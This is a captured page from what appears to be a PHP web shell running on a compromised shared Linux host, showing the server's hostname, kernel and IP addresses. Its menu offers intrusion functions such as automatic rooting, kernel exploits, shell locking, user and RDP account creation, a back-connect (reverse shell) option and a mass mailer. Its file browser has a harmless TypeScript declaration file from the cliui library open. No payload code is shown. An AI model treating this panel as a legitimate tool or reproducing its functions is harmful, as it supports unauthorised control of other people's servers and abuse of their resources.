Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
cliui /
build /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
cjs.d.ts
110
B
-rw-r--r--
index.d.ts
1.08
KB
-rw-r--r--
string-utils.d.ts
122
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
export interface UIOptions { width: number; wrap?: boolean; rows?: string[]; } interface Column { text: string; width?: number; align?: 'right' | 'left' | 'center'; padding: number[]; border?: boolean; } interface ColumnArray extends Array<Column> { span: boolean; } interface Line { hidden?: boolean; text: string; span?: boolean; } interface Mixin { stringWidth: Function; stripAnsi: Function; wrap: Function; } export declare class UI { width: number; wrap: boolean; rows: ColumnArray[]; constructor(opts: UIOptions); span(...args: ColumnArray): void; resetOutput(): void; div(...args: (Column | string)[]): ColumnArray; private shouldApplyLayoutDSL; private applyLayoutDSL; private colFromString; private measurePadding; toString(): string; rowToString(row: ColumnArray, lines: Line[]): Line[]; private renderInline; private rasterize; private negatePadding; private columnWidths; } export declare function cliui(opts: Partial<UIOptions>, _mixin: Mixin): UI; export {};
Close